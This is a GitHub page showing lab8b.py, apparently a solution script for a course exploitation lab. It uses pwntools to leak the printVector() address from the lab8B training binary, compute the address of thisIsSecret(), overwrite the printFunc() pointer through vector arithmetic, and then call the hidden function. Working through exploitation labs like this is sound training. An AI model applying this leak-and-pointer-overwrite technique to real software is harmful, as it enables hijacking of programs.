-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathlab8b.py
More file actions
64 lines (54 loc) · 1.37 KB
/
lab8b.py
File metadata and controls
64 lines (54 loc) · 1.37 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *
# printVector() - thisIsSecret()
THIS_IS_SECRET_OFFSET = 0x10e9 - 0x10a7
BIN_PATH = "/hdd/VM-Shared/levels/lab08/lab8B"
p = process(BIN_PATH)
log.info("Stage #1 - Adding first vector")
p.sendline("1")
p.sendline("1")
p.sendline("1")
p.sendline("1")
p.sendline("1")
p.sendline("1")
p.sendline("1")
p.sendline("1")
p.sendline("1")
p.sendline("1")
p.sendline("1")
log.info("Stage #2 - Leaking printVector() address")
p.sendline("3")
p.recv()
p.sendline("1")
buf = p.recvuntil("\nchar")
printvector_addr = int(buf.split()[-2], 16)
log.info("Leaked printVector() address: 0x{:x}".format(printvector_addr))
thisissecret_address = printvector_addr - THIS_IS_SECRET_OFFSET
log.info("thisIsSecret() address: 0x{:x}".format(thisissecret_address))
log.info("Stage #3 - Adding second vector")
p.sendline("1")
p.sendline("2")
p.sendline("1")
p.sendline("1")
p.sendline("1")
p.sendline("1")
p.sendline(str(thisissecret_address - 1))
p.sendline("1")
p.sendline("1")
p.sendline("1")
p.sendline("1")
log.info("Stage #4 - Summing the vectors")
p.sendline("2")
log.info("Stage #5 - Overwrite printFunc() address")
p.sendline("4")
p.sendline("4")
p.sendline("4")
p.sendline("4")
p.sendline("4")
log.info("Stage #6 - Load malicious vector into v1")
p.sendline("6")
p.sendline("4")
p.sendline("1")
log.info("Stage #7 - Execution of thisIsSecret()")
p.sendline("3")
p.sendline("1")
p.interactive()